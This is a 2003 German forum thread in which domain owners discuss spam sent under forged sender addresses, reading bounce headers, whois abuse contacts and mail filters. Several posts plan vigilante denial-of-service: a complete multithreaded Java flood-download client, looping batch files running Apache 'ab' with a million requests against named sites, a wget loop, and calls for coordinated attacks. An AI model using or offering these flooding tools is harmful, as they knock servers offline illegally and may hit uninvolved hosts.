nicht angemeldet
Domain Missbrauch für Spam mails
0 0 0 Attacke!!!!!
Domain Missbrauch für Spam mails
Hallo,
als ich heute in meine Mailbox schaute überkam mich das nackte Grausen. Zig mails, die scheinbar von mir versendet wurden an unterschiedliche Empfänger und Domains, die es teilweise nicht gibt.
Somit massig Fehlermeldungen von wegen den gibt es nicht etc.
Was kann ich dagegen tun?
Wie kann ich mich gegen diesen Missbrauch schützen bzw. wie kann ich den Verantwortlichen dingfest machen?
Gruss Andreas
-
Hallo Andreas,
Zig mails, die scheinbar von mir versendet wurden an unterschiedliche Empfänger und Domains, die es teilweise nicht gibt.
Gleiches Schicksam ereilte mich auch. Alle Mails sind mit @tibbe-online.de
"ausgestattet", den Alias habe ich aber _sicher_ nie zuvor verwendet.Ich poste einfach mal eine Mail, die "ich" geschrieben haben soll:
------------------------
Return-Path: j.mcGinnisui@tibbe-online.de
Received: from material.qui.ub.es ([68.52.227.210])
by rmail-166.hanmail.net (8.12.9/8.9.1) with ESMTP id h8CJXTBZ018709
for <EMAILADRESSE>; Sat, 13 Sep 2003 04:34:00 +0900
X-Hanmail-Peer-IP: 68.52.227.210
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Date: Sat, 13 Sep 2003 03:33:56 +0000
Subject: =?ISO-8859-1?B?UmU6T2ggU2lsZGVuYWZpbCBDaXRyYXRlICE=?=
To: EMAILADRESSE
MIME-Version: 1.0
Message-ID: LEACAIHAOIENMELCKJAGNJEPDEAB.j.mcGinnisui@tibbe-online.de
From: "Judy McGinnis" j.mcGinnisui@tibbe-online.de
Content-Type: text/html
Content-Transfer-Encoding: 8bit<html><body>
<center><!--5ltv3m3f6c1--><a href="http://www.account7x24.com/host/default.asp?ID=omni"><img src="http://visithere3.com/pics/gv1.gif" height="270" width="405"></a></center>
</html></body>
------------------------An Spam mag man sich ja schon gewöhnt haben, aber diese Mails (heut waren
es denke ich rund 50 derart) nerven dann doch sehr.
Einzigst effektives Mittel wird wohl sein, die Domain und eMail-Adresse zu
löschen und nie wieder eine Adresse irgendwo anzugeben.Wo hast du deine Domain denn her? Meine ist von Freecity, wie unschwer zu
erkennen ist.Grüße
David--
>>Nobody will ever need more than 640k RAM!<<
1981 Bill Gates-
Hallo noch einmal,
Wo hast du deine Domain denn her? Meine ist von Freecity, wie unschwer zu
erkennen ist.Deine wohl auch, tippe ich. Gerde schaute ich einmal bei denen vorbei und
siehe da: http://forum.freecity.de/board/showBeitrag.phtml?id=856&tid=856&topic=L0001a1Grüße
David--
>>Nobody will ever need more than 640k RAM!<<
1981 Bill Gates -
Moin!
Return-Path: j.mcGinnisui@tibbe-online.de
Received: from material.qui.ub.es ([68.52.227.210])href="http://www.account7x24.com/host/default.asp?ID=omni"><img src="http://visithere3.com/pics/gv1.gif" height="270"
[ Informations about 68.52.227.210 ]
IP range : 68.52.192.0 - 68.52.255.255
Network name : NASHVILLE-5
Infos : Comcast Cable Communications, Inc.
Infos : 3 Executive Campus
Infos : 5th Floor
Infos : Cherry Hill
Infos : NJ
Infos : 08002
Country : United States of America (US)
Abuse E-mail : abuse@comcast.net
Source : ARIN
% The CyberAbuse Whois
% Copyright 2003, Philippe Bourcier
% http://www.cyberabuse.org/whois/[1] Beim Abuse ganz bitterböse beschweren.
[2] www.account7x24.com visithere3.com
Diese Adressen sind an sofort "blacklisted" bei http://banner.fastix.de/hosts.gzInsofern: Danke....
MFFG (Mit freundlich- friedfertigem Grinsen)
fastix®
--
Meinereinerselbst ist auf der Suche nach Aufträgen-
Hi,
man könnte auch ein Script schreiben welches das Bestellformular mit Dummy Bestellungen nicht existierender (Post) Adressen flutet.
Dominik
-
Naja keine schlechte Idee,
es stellt sich nur die Frage, ob der Hersteller mit der Werbung auch einverstanden ist. Oder ob nur ein Geisteskranker Irrer irgendwas rummailt.Ebenfall sschätze ich mal, dass Du dan ganz bestimmt rechtliche konsequenzen zu erwarten hast, wenn man dich erwischt und das wird ganz bestimmt rechtlich verfolgt.
Gruss andreas
Ansonsten eine gute Idee. Ich bin dabei.
-
Naja keine schlechte Idee,
es stellt sich nur die Frage, ob der Hersteller mit der Werbung auch einverstanden ist. Oder ob nur ein Geisteskranker Irrer irgendwas rummailt.Das sehe ich als rhetorische Frage an...
Bei Dialer Spam habe ich öfters mal folgende Vorgehensweise praktiziert (DSL Flatrate sei dank):
Mittels eines Mulithreaded Java Programms (um auch die 92 Kilobyte/sek. zu erreichen) habe ich das so aufdringlich beworbene Produkt, den Dialer, etliche 10000 mal heruntergeladen. Dies war nötig da mein selbstgeschriebener HTTP - Download Client fehlerhaft arbeitet und das Speichern auf Platte bedauerlicherweise noch nicht klappt.
Aber ich arbeite daran :-)
Einige Dialer Spammer versahen daraufhin Ihre Server mit einer IP - Sperre, die nur fünfmaliges Downloaden erlaubt :-(Dominik
-
Hi, also ich bin dabei, wenn dein Tool wirklich taugt, dann werde ich es auch anwenden, wobei mir es egal ist die IP zig tausend mal zu ändern.
Aber was anderes... es gibt ja diese html kopier tools.
Warum nicht den Servr solange besaugen, bis er aufgibt.??Gruss Andreas
-
Hallo,
IP ändern heißt sich neu einwählen, und das dauert. Dadurch sinkt die Durchscnittsgeschwindigkeit erheblich und macht die ganze Sache sinnlos - auch weil man nebenher nicht mehr surfen kann.
Und Absender IP fälschen macht in diesem Szenario überhaupt keinen Sinn - von der rechtlichen Seite mal ganz abgesehen.Die "html kopier tools" haben den selben Effekt, ich habe das Programm geschrieben weil:
- es schneller lädt
- ich nur die beworbene Leistung in Anspruch nehme :-)
Außerdem ist es sehr simpel und nicht gerade ein Beispiel höherer Programmierkunst. Aber OK:
import java.net.*;
import java.io.*;class httpload implements Runnable{
private static final int NUMBER_OF_THREADS = 10;
private static String server = "";
private static String path = "";
private static long leechedBytes = 0;
private static long starttime;
private static long outcounter =0;public static void main (String []args) {
String url;
int firstSlash;if (args.length>0)
{
url=args[0];
if (url.toLowerCase().startsWith("http://"))
{
url = url.substring(7);
}
firstSlash = url.indexOf("/");
if (firstSlash == -1) //kein Pfad...
{
server = url;
path = "/index.html";
}
else
{
server = url.substring (0, firstSlash);
path = url.substring ( firstSlash , url.length());
}
}
else
{
System.err.println("Bitte URL angeben!");
return;
}
System.out.println("Lade...\nServer: "+server+"\nPfad: "+path);starttime= System.currentTimeMillis();
for (int x=0;x<NUMBER_OF_THREADS;x++) {
Runnable r = new httpload();
Thread t = new Thread(r);
t.start();
}
}static synchronized void countstats (int groesse) {
long dauer;
leechedBytes+=groesse;
outcounter++;
if (outcounter%10==0) {
System.out.print("Laenge (kb) : "+leechedBytes/1024+" ");
dauer = (System.currentTimeMillis()-starttime)/1000;
System.out.println("kb/s: "+(double)leechedBytes/(1024*dauer)+" Anzahl: "+outcounter);
}
}public void run() {
Socket s=null;
OutputStream outs=null;
InputStream ins=null;
String st;
String uri;
byte [] b = new byte[100];
int x,y;
st = new String("GET "+path+" HTTP/1.0\nHost: "+server+"\n\n");
while (true) {
try {
s =new Socket(server,80);
outs=s.getOutputStream();
ins=s.getInputStream();
outs.write(st.getBytes());
outs.flush();
y=0;
do {
x=ins.read(b);
y+=x;
}
while(x!=-1);
y++;
countstats(y);
outs.close();
ins.close();
s.close();
} catch (Exception r) {
System.out.println("Fehler: "+r);
}
}
}
}Wie du siehst ist es unfertig - der Code der die geladene Datei abspeichert fehlt leider noch, du kannst es ja weiterentwickeln :-)
Dominik
-
Moin,
Die "html kopier tools" haben den selben Effekt, ich habe das Programm geschrieben weil:
- es schneller lädt
man ab
--
Henryk Plötz
Grüße von der Ostsee
~~~~~~~~ Un-CDs, nein danke! http://www.heise.de/ct/cd-register/ ~~~~~~~~
~~ Help Microsoft fight software piracy: Give Linux to a friend today! ~~-
man ab
Was ist das denn?
Ich kenne nur wget.Dominik
-
Moin,
man ab
Was ist das denn?
http://httpd.apache.org/docs/programs/ab.html
Liegt dem Apache bei.--
Henryk Plötz
Grüße von der Ostsee
~~~~~~~~ Un-CDs, nein danke! http://www.heise.de/ct/cd-register/ ~~~~~~~~
~~ Help Microsoft fight software piracy: Give Linux to a friend today! ~~-
Hallo,
sehr interessant, danke für den Link. Performancemessungen können natürlich auch aus wissenschaftlichen Gründen notwendig werden :-)
Dominik
-
Hi,
mit folgendem Script bin ich grad kräftig dabei und muss feststellen, dass entweder der server down ist oder meine ip gesperrt.
:1
ab -k -n 1000000 -c30 http://www.refer34.com/host/default.asp?ID=omni
ab -k -n 1000000 -c30 http://www.copyrighte.com/host/default.asp?ID=omnigoto 1
-
-
-
Moin!
Zu groß.
Dos- batch::1
wget --user-agent Spammers_Feind http://www.spamsau.com/xxx.jpg
del *.jpg*
goto 1Zieht die Datei bis der Arzt kommt.
Den kann man auch 15 mal starten...
Was Du brauchst ist wget.exe. Ist Freeware.
Mit einem Shellscript geht das natürlich auch unter Linux.Ich bin auch der Meinung, man darf sich so wehren. Ist zwar Selbstjustiz, aber hier versagt das Rechtssystem ganz eindeutig.
Richtig würde man es machen, wenn jeden Morgen einer der Spamsäcke ausgewählt wird und dann tausende Ihre Skripte parametrisieren um dem "Spamschwein des Tages" richtig auf die Pelle zu rücken.
DoS, ja klar. Aber was für einen "Service"?
Müssen eben auch die Provider ein wenig drauf achten, was ihre Kunden treiben. Ist ja eigentlich deren Pflicht.Ach übrigens:
<strong>BT Ignite fördert Spammer</strong>
http://www.it-schule.de/nachricht_zeigen.php?id=14&start=1&bereich_id=3MFFG (Mit freundlich- friedfertigem Grinsen)
fastix®
--
Meinereinerselbst ist auf der Suche nach Aufträgen-
Hi,
ich bekomme das Zeug nicht kompiliert für mene windows Kiste arbeite mit Borland c.
Kann mir jemand das kompilierte Modul dazu geben für windows...
Würde ja gleich die Kiaste mit saugen bestrafen.Gruss Andreas
-
Moin!
Kann mir jemand das kompilierte Modul dazu geben für windows...
Würde ja gleich die Kiaste mit saugen bestrafen.http://studwww.ugent.be/~bpuype/cgi-bin/fetch.pl?dl=wget/wget.exe
MFFG (Mit freundlich- friedfertigem Grinsen)
fastix®
--
Meinereinerselbst ist auf der Suche nach Aufträgen
-
-
-
-
-
-
-
-
Hi David,
bei mir sieht es nicht viel anderster aus. Ich veröffentliche jedoch meine Domain nicht, nicht dass dann noch jemand als Trittbrettfahrer das ganze verschlimmert.
Schade rechtlich kann man nicht`s dagegen tun. Mir wäre es egal gewesen ich hätte glich richtig rabatz gemacht die kosten sind hierbei 2. Rangig.
Meine Domain, wird bei mir persönlich gehostet. Das Kabel stammt von der Telekom. Der Rechner bzw. die domainj ist durch eine Fiewall dicht ausser dem Port 80 sowie http und https requests geht da nicht`s durch.
Bekannt ist die Domain nur Geschäftspartnern Kunden usw.
halt jenen, mit denen ich per mail komuniziere.gehackt wurde ich nicht das habe ich schon geprüft. Weder die Firewall selber noch der Popserver etc. geben hierüber aufschluss.
Möchte blos wissen wer auf so einen Sch. kommt.
Trotzdem sollte es möglich sein würde ich den Pissern gerne eines vor den Latz knallen. Ich meine einen anwalt wie einen Pitt Bull hinterher hetzen.Und das ist das Zeug, das ich dezeit zurück bekomme.
Reporting-MTA: dns;3w-smtp-bg.korea.com
Received-From-MTA: dns;smtp021.korea.com
Arrival-Date: Fri, 12 Sep 2003 19:00:47 +0900Final-Recipient: rfc822;gsoup@korea.com
Action: failed
Status: 5.1.1Received: from smtp021.korea.com ([211.109.1.6]) by 3w-smtp-bg.korea.com with Microsoft SMTPSVC(5.0.2195.6713);
Fri, 12 Sep 2003 19:00:47 +0900
Received: from [138.88.239.253] (sophia_pierre_ms@weiss-system.de) by
smtp021.korea.com (Terrace MailWatcher)
with ESMTP id 2003091219:04:11:442663.23394.26133525
for gsoup@korea.com;
Fri, 12 Sep 2003 19:04:11 +0900 (KST)
To: gsoup@korea.com
Message-ID: 1063360836.7510@mydomain.de
X-Mailer: Pegasus Mail for Win32 (v3.12a)
Date: Fri, 12 Sep 2003 10:00:36 +0000
From: "Sophia Pierre" <sophia_pierre_ms@mydomain.de>
Subject: =?iso-8859-1?B?TGltaXRlZCB0aW1lIG9mZmVyIG9uIGRpc2NvdW50IFNpbGRlbmFmaWwgQ2l0cmF0ZQ==?=
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
X-TERRACE-SPAMRATE: g=0.00 l=3.00 NOT YET spam-rated.
Return-Path: sophia_pierre_ms@mydomain.de
X-OriginalArrivalTime: 12 Sep 2003 10:00:48.0707 (UTC) FILETIME=[BDCBE930:01C37914]Wobei mydomain entsprechend geaendert wurde.
Grus Andreas
-
Moin!
Received: from smtp021.korea.com ([211.109.1.6]) by
^^^^^^^^^^^^^^^^^^ gibts nicht, aber:
[ Informations about 211.109.1.6 ]
Infos : Thrunet Co., Ltd (THRUNET) (THRUNET)
Infos : 1337-20 Seocho-2dong, Seocho-ku
Country : South Korea (KR)
Abuse E-mail : ip@thrunet.com
Source : KRNIC% Copyright Korea Network Information Center
% The CyberAbuse Whois
% Copyright 2003, Philippe Bourcier
% http://www.cyberabuse.org/whois/MFFG (Mit freundlich- friedfertigem Grinsen)
fastix®
--
Meinereinerselbst ist auf der Suche nach Aufträgen-
Hallo,
kannst Du mir das mal im klartext erklären??
Ausserdem was suchst Du den für Aufträge?
Gruss Andreas
-
Moin!
Hallo,
kannst Du mir das mal im klartext erklären??
Abuse E-mail : ip@thrunet.com
Nun, wenn ich das richtig lesen habe, hast Du den Header des Mails gepostet, welches returniert wurde.
Aus dem geht hervor, daß der Mailserver, der die Mail an den ursprünglich angedachten Empfänger versenden wollte, die IP 211.109.1.6 hat. Ein whois via cyberabuse.org liefert den zuständigen Abuse. Der hat dafür zu sorgen, daß seine Kunden nicht spammen oder "open relays" betreiben.
Der zuständige Abuse steht oben.
MFFG (Mit freundlich- friedfertigem Grinsen)
fastix®
--
Meinereinerselbst ist auf der Suche nach Aufträgen-
Moin!
Hallo,
kannst Du mir das mal im klartext erklären??
Abuse E-mail : ip@thrunet.com
Nun, wenn ich das richtig lesen habe, hast Du den Header des Mails gepostet, welches returniert wurde.
Aus dem geht hervor, daß der Mailserver, der die Mail an den ursprünglich angedachten Empfänger versenden wollte, die IP 211.109.1.6 hat. Ein whois via cyberabuse.org liefert den zuständigen Abuse. Der hat dafür zu sorgen, daß seine Kunden nicht spammen oder "open relays" betreiben.
Moin Fastix,
Meinste damit hast Du Erfolg Fastix.
Ich denke das ist ein solcher "Anonymisierungsdienst".
Da schaue Dir doch mal Andreas Website an....
Wie sah denn die mail.htm aus?
Welchen Formmailer hast Du verwendet auf welchem System?
Da könnte meiner Ansicht nach das Problem liegen.
Hast Du Dir Dein SMTP-Log mal genau angeguckt?
Nur so ne Idee!TomIRL
-
Hi,
ja ich habe schon geprüft, dass ich nicht selbst der Verursacher bin.
Über meinen SMTP Server gint nicht`s drüber.
Ich habe zwar ein mail Script auf dem Servr, das jedoch erlaubt nur den Kontakt zu mir und nicht anderster.Dafür platzt meine Mailbox heue morgen wieder fast.
So ein Misst möchte nur wissen was für eine A. Geige sich so einen scheiss erlaubt.Ich glaube früher oder später gehe ich auch noch zu Mafia.
Da gibt es dann sicherlichn den einen oder anderen Paten, der das Problem sauber und zuverläsig löst.Gruss Andreas
-
Hi Andreas,
Kennst Du Procmail?Dann baue Dir vorübergehend ne Filterregel die alles erst einmal in eine Datei schreibt und einen Bounce produziert.
Dann ist erst einmal Ruhe!
Hilfe zu .procmail findest Du hier:
http://www.butschek.de/content/procmail/TomIRL
-
Moin!
Dann baue Dir vorübergehend ne Filterregel die alles erst einmal in eine Datei schreibt und einen Bounce produziert.
Falsch. Er bekommt bereits den Bounce. Schreib Dir was, was eingehende Bounces in /dev/null speichert.
MFFG (Mit freundlich- friedfertigem Grinsen)
fastix®
--
Meinereinerselbst ist auf der Suche nach Aufträgen-
Und wenn die Bounce, wie ab und zu geschrieben, einen orginal Header bringen könnte er dann zumindest ein abuse machen.
Das mit /dev/null würde ich auch machen, weil ich keine Bock hätte den ganzen Mist zu lesen.
Ich würde aber auch den Mailaccount dicht machen und mir einen neuen "basteln", und den alten mit ner Autoreplay rausschicken, in der steht was passiert ist und wie die Leute an meine neue Adresse kommen.TomIRL
-
-
-
-
-
Hej fastix,
mittlerweile quillt meine Mailbox auch über.
Dein Lösungsansatz zieht nur leider nicht, da bei schon fünf zufällig ausgewählten Emails, unterschieldiche Sender vorhanden sind :-(((((.
Langsam finde ich diese schwarzen Schafe im INet zum kotzen!!!
Marko
... der mittlerweile ziemlich genervt darüber, ist, daß man seine HP verstecken muß.
-
-
-
Auch Moin!
Received: from smtp021.korea.com ([211.109.1.6]) by
^^^^^^^^^^^^^^^^^^ gibts nicht, aber:Haettest Du nicht 138.88.239.253 ueberpruefen sollen? Schliesslich ist doch die unterste Received-Zeile die erste in der SMTP-Kommunikation. smtp021.korea.com ist doch nur der Server, der die Mail fuer gsoup@korea.com empfaengt. Innerhalb von Firmennetzwerken werden Mails dann manchmal noch weitergereicht, deshalb kam eine weitere Zeile hinzu.
Received: from [138.88.239.253] (sophia_pierre_ms@weiss-system.de) by
smtp021.korea.com (Terrace MailWatcher)
with ESMTP id 2003091219:04:11:442663.23394.26133525
for gsoup@korea.com;
Fri, 12 Sep 2003 19:04:11 +0900 (KST)138.88.239.253 wird bei mir jedoch zu pool-138-88-239-253.res.east.verizon.net revers-aufgeloest, was offenbar ein Dialup-Anschluss ist. Wie kommt "sophia_pierre_ms@weiss-system.de" dort hin?
[ Informations about 211.109.1.6 ]
Schreibst Du diese Zeile selbst oder gehoert das zum Output eines Programms? "Information" im Englischen hat keine Mehrzahlform.
So long
--
I'm sorry. It has to end here.
-
-
-
-
Hi,
als ich heute in meine Mailbox schaute überkam mich das nackte Grausen. Zig mails, die scheinbar von mir versendet wurden an unterschiedliche Empfänger und Domains, die es teilweise nicht gibt.
Somit massig Fehlermeldungen von wegen den gibt es nicht etc.
Was kann ich dagegen tun?
Nichts.
Es ist ueblich bei SPAM-Mails dass echte Absendeadressen genutzt werden, damit die Leute nicht mehr auf die Adressen filtern koennen...Wie kann ich mich gegen diesen Missbrauch schützen bzw. wie kann ich den Verantwortlichen dingfest machen?
Du koenntest versuchen, ueber den Received:-Header herauszubekommen, von welchen Provider die SPAM ausging.
Aber nur dumme ANfaenger unter den SPAMern machen dabei einen Fehler und lassen sich zurueckverfolgen. Die meisten nutzen irgendeinen Proxy in China oder einen Anonymisierungsdienst.Ciao,
Wolfgang-
Moin,
Nichts.
Es ist ueblich bei SPAM-Mails dass echte Absendeadressen genutzt werden, damit die Leute nicht mehr auf die Adressen filtern koennen...Das hat so aber erst vorgestern bei mir angefangen. Ich habe von wenigstens einem anderen gehört bei dem das auch erst in dem selben Zeitraum losging.
Ich habe jetz so ca. 200 dieser Rückläufer gesammelt. Was ich so vom drüberschauen als charakteristisch erkennen kann:- Die 'Absenderaddressen' sind natürlich gefälscht, haben aber meinen Domainnamen. Davor steht immer ein anderer Name, und der lokal part ist plausibel für diesen Namen.
- Der Empfänger ist natürlich immer ein anderer
- Der ursprüngliche Rechner benutzt für HELO bzw. EHLO immer etwas das wie ein Domainname aussieht. Der ist immer anders und hat auch keine Beziehung zu mir oder dem Empfänger.
- Was mich total verwirrt: Der ursprüngliche Rechner ist (fast!) immer ein anderer. Die Ursprungsrechner sind wild über das Internet verteilt und selten auch nur im selben Subnetz. Insbesondere dieser Punkt lässt Abuse-Reports schwer aussehen.
- Vom Subject würde ich sagen dass meisst für Sildenafil Citrate oder Viagra geworben wird. Einige der bouncenden Mailserver waren so freundlich auch noch den Body mitzuschicken. Der Body ist immer so ähnlich wie der hier bereits gepostete, aber die Domainnamen wechseln.
Weitere Gemeinsamkeiten bei allen Mails konnte ich nicht entdecken. Ein großer Teil der Mails hat Message-IDs die mit meiner Domain generiert wurden. Die X-Mailer-Zeilen scheinen auch aus einem Pool von möglichen Zeilen generiert werden, und die anderen Header passen dann jeweils dazu:
* X-Mailer: Windows Eudora Pro Version 2.2 (32)
* X-Mailer: Pegasus Mail for Win32 (v3.12a)
* User-Agent: Mozilla/5.001 (windows; U; NT4.0; en-us) Gecko/25250101
* X-MimeOLE: Produced By Microsoft Exchange V6.0.6290.0
* X-Mailer: Microsoft Outlook Express 6.00.2800.1158
und passend dazu:
+ X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
+ X-Priority: 3
+ X-MSMail-Priority: Normal
usw. usf.
Dieses Kriterium ist also leider nicht zum Filtern geeignet.Du koenntest versuchen, ueber den Received:-Header herauszubekommen, von welchen Provider die SPAM ausging.
Wie gesagt, die Rechner wechseln wild. Wenn das nicht bald aufhört werde ich mir wohl ein kleines Skript schreiben müssen was die beworbenen Domainnamen und die Ausgangsrechner zusammensucht. Die beworbenen Domains die ich stichprobenartig überprüft habe waren alle bei paycenter.com.cn registriert und hatten teilweise den gleichen billing contact. Ob es hilft sich dort zu beschweren? (Bzw. ob die überhaupt englisch verstehen?)
--
Henryk Plötz
Grüße von der Ostsee
~~~~~~~~ Un-CDs, nein danke! http://www.heise.de/ct/cd-register/ ~~~~~~~~
~~ Help Microsoft fight software piracy: Give Linux to a friend today! ~~-
Hi,
gewisserweise bin ich erleichtert, dass ich nicht er einzigste bin.
Ich prüfe derzeit alle möglichen rechtlichen Schrite, die getan werden können. Und werde auch alle möglichen rechtlichen Schritte
verwende um dem Spuck ein ende zu bereiten.Vieleicht kann man sich ja auch an Sat1 und oder pro 7 etc. wenden, die ja immer wieder "Spam super profi Experten" haben, die was dagegen unternehmen.
Ich glaube zwar nicht, dass man da weiter komt aber versuchen kann man es ja.Bei der Polizei selbst, wid man nur vertröstet und irgendwo hin gesendet.
Gruss Andreas
-
Halli hallo,
das, was Du geschrieben hast, ist Punkt für Punkt haargenau bei mir der Fall, nur daß es wesentlich mehr als 200 Rückläufer sind. Fast jede Minute kommt einer rein, ich bin nur noch am Löschen, weil ich keine richtige Idee für eine Filterregel habe. Dazu kommt, daß ich dieses WE ziemlich anderweitig beschäftigt bin.
Die letzte, die gerade reinkam, hatte als Header:
-----------------------------------------------------------------
X-Envelope-From: MAILER-DAEMON@post.webmailer.de
X-Envelope-To: <lrosect@....de>
X-Delivery-Time: 1063442292
Received: from smtp22.singnet.com.sg (smtp22.singnet.com.sg [165.21.101.202])
by mailin.webmailer.de (8.12.8/8.8.7) with ESMTP id h8D8cAeH003190
for <lrosect@....de>; Sat, 13 Sep 2003 10:38:11 +0200 (MEST)
Received: from mailbox.singnet.com.sg ([10.1.1.227])
by smtp22.singnet.com.sg (8.12.9/8.12.9) with ESMTP id h8D8c92M001845
for <lrosect@....de>; Sat, 13 Sep 2003 16:38:09 +0800
Received: from localhost (localhost)
by mailbox.singnet.com.sg (Mirapoint Messaging Server MOS 3.3.3-GR)
with internal id CNB54970;
Sat, 13 Sep 2003 16:38:08 +0800 (SGT)
Date: Sat, 13 Sep 2003 16:38:08 +0800 (SGT)
From: Mail Delivery Subsystem MAILER-DAEMON@singnet.com.sg
Message-Id: 200309130838.CNB54970@mailbox.singnet.com.sg
To: lrosect@....de
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
boundary="CNB54970.1063442288/mailbox.singnet.com.sg"
Subject: Returned mail: Over quota
Auto-Submitted: auto-generated (failure)
-----------------------------------------------------------------Der Inhalt war:
-----------------------------------------------------------------
The original message was received at Sat, 13 Sep 2003 16:38:07 +0800 (SGT)
from mx11.mcis.singnet.com.sg [10.1.1.231]----- The following addresses had permanent delivery errors -----
<kelvin9>
-----------------------------------------------------------------Wäre es besser, diese Mails aufzuheben?
Viele Grüße an die Ostsee
Jörg
-
Hallo,
ich hebe einen grossteil der mails auf, somit habe ich am Montag, wenn ich den ganzen Sch... zur Anzeige bringe wenigstens Beweise.
Ob das eine Erfolg hat ist eine andere Frage aber ich versuche es auf jeden Fall.Andreas
-
Hallo,
gerade bin ich fündig geworden:
Falls der Link nicht funktioniert:
http://www.strato-faq.de/view.php4?articleid=824&subcatid=7&page=1&url_literal=&stype=&maxrows=1&pcatid=&extern=
Ich bin bei Strato ...
Viele Grüße
Jörg
-
Hallo,
das hört sich ja nett an, jedoch hilft deren methode nur mir diese Fehlermeldungen zu eliminieren aber nicht jedoch dn Missbrauch meiner Domain zu beenden.
Also nur eine kleine hilfe.
Aber eine antiSpam Software habe ich ja chon. das löst ja das Problem nicht in der wurzel.Gruss Andreas
-
Hallo Andreas,
das hört sich ja nett an, jedoch hilft deren methode nur mir diese Fehlermeldungen zu eliminieren aber nicht jedoch dn Missbrauch meiner Domain zu beenden.
Das ist schon klar, aber an einigen Stellen in anderen Foren wurde vermutet, daß es am Provider gelegen hätte - jedoch scheint es mittlerweile klar zu sein, daß es wirklich einfach gefälschte Absenderadressen sind.
Aber eine antiSpam Software habe ich ja chon. das löst ja das Problem nicht in der wurzel.
Leider nicht. Ich werde erstmal auf meinen Seiten ein Dementi einbauen, damit nicht jemand denkt, die Mails kämen von mir.
Dann mal noch ein schönes WE
Jörg
-
-
-
-
Moin,
das, was Du geschrieben hast, ist Punkt für Punkt haargenau bei mir der Fall, nur daß es wesentlich mehr als 200 Rückläufer sind. Fast jede Minute kommt einer rein, ich bin nur noch am Löschen, weil ich keine richtige Idee für eine Filterregel habe. Dazu kommt, daß ich dieses WE ziemlich anderweitig beschäftigt bin.
Mein bogofilter filtert die nach ein paar Exemplaren Training zuverlässig mit dem anderen Müll aus.
Wäre es besser, diese Mails aufzuheben?
Ja, auf jeden Fall. Abuse-Reports schreiben sich sonst so schlecht ;-)
(Ich schmeisse eh nie eine Mail weg. Die landen höchstens im Ordner "müll".)
--
Henryk Plötz
Grüße von der Ostsee
~~~~~~~~ Un-CDs, nein danke! http://www.heise.de/ct/cd-register/ ~~~~~~~~
~~ Help Microsoft fight software piracy: Give Linux to a friend today! ~~
-
-
Hi,
.
Es ist ueblich bei SPAM-Mails dass echte Absendeadressen genutzt werden, damit die Leute nicht mehr auf die Adressen filtern koennen...
Das hat so aber erst vorgestern bei mir angefangen. Ich habe von wenigstens einem anderen gehört bei dem das auch erst in dem selben Zeitraum losging.
Ich habe jetz so ca. 200 dieser Rückläufer gesammelt. Was ich so vom drüberschauen als charakteristisch erkennen kann:Ja, das kommt auf die Art des SPAMMer-Programmes an.
Wenn man eine Liste an validen Adressen hat, dann nutzt man dioese nicht nur als Adresaten, sondern auch als Absender.
Wenn man jedoch mit einem Schwupps mal ein paar Millionen Mails
senden will, muss man auch etwas auf Effizienz achten.
Dies bedeutet natuerlich, dass man nicht bei jeder einzelnen Mail
einen anderen Absender nimmt, sondern vielleicht erst nach ca. 1000 oder 10000 Mails.Das es dich bisher vorher nicht erwischt war wohl nur Glueck.
Ich hab am Dienstag mal eine Statistik gemacht:
ich habe da 856 Mails erhalten.
Davon waren ca. 550 Mails SPAM. Ruecklaeufer aufgrund gefakted Absendeadressen von mir hab ich etwa 40 - 50 am Tag.
Ruecklaeufer aufgrund Dummuser, die den Absender fuer den SPAMer halten, hab ich etwa 1 pro Woche.Meine Adresse xwolf@xwolf.com bzw .de ist seit 1996 im Betrieb
und dank Internic und Denic oeffentlich als valide deklariert... :)Ich ueberlebe das relativ gut durch procmail und Spamassassin.
Wie gesagt, die Rechner wechseln wild. Wenn das nicht bald aufhört werde ich mir wohl ein kleines Skript schreiben müssen was die beworbenen Domainnamen und die Ausgangsrechner zusammensucht. Die beworbenen Domains die ich stichprobenartig überprüft habe waren alle bei paycenter.com.cn registriert und hatten teilweise den gleichen billing contact. Ob es hilft sich dort zu beschweren? (Bzw. ob die überhaupt englisch verstehen?)
Wenn es Domains sind, die in D lokalisierbar sind, dann kann man etwas machen.
Ansonsten eine Standardmail aufsetzen, die an abuse@HOSTER mailt, wobei es aber wirklich der Hoster des Received-Headers sein muss und nicht irgendeinen anderen.Allerdings hat das fuer mich auch einen Nachgeschmack: SPAMer koennen auch Hoster sein. Die SPAMer wissen ja, dass inzwischen der Hinwies rum ist, man solle sich nicht mehr auf dem Abmelden-Link bewegen...
Sondern man soll sich an die Abuseadresse des providers wenden..Na hoert mal: Wenn ein SPAMer gut ist, verdient der sich genug um sich ein paar Provider zu kaufen! Da hat er dann mit der abuse-Adresse eine ideale Sammelbox fuer die Bestaetigung von EMailadressen!
Ciao,
Wolfgang-
Moin,
Das es dich bisher vorher nicht erwischt war wohl nur Glueck.
Nicht nur. Ein Blick in de.admin.net-abuse.mail bestätigt dass dieser Spammer erst seit kurzem aktiv ist, undzwar massiv.
Ich ueberlebe das relativ gut durch procmail und Spamassassin.
Ja, main bogofilter schluckt die auch alle weg, das ist nicht das Problem. Ich hoffe aber dass man diesem Spammer das Handwerk legen kann.
--
Henryk Plötz
Grüße von der Ostsee
~~~~~~~~ Un-CDs, nein danke! http://www.heise.de/ct/cd-register/ ~~~~~~~~
~~ Help Microsoft fight software piracy: Give Linux to a friend today! ~~
-
-
-
Hallo,
ich attackiere nun den offensichtlichen Verursacher mit :
:1
ab -k -n 1000000 -c30 http://www.refer34.com/host/default.asp?ID=omni
ab -k -n 1000000 -c30 http://www.copyrighte.com/host/default.asp?ID=omnigoto 1
batch Datei.Eigentlich der falsche weg aber sollen die sich doch bei mir melden.
Lieben vilen Dank ich freu mich schon darauf.Wer mitmachen will und auch geschädigt ist.
Es ist zwar selbstjustiz aber wenn was anderes nicht mehr hilft!!!
die ab.exe ist bei apache ab Version 1.3.x mit dabei.Also haut rein.
Gruss Andreas-
Hallo Andreas!
ich attackiere nun den offensichtlichen Verursacher mit :
Ich denke nicht, daß dies der Ort ist um zu öffentlichen Attacken gegen wen auch immer aufzurufen!
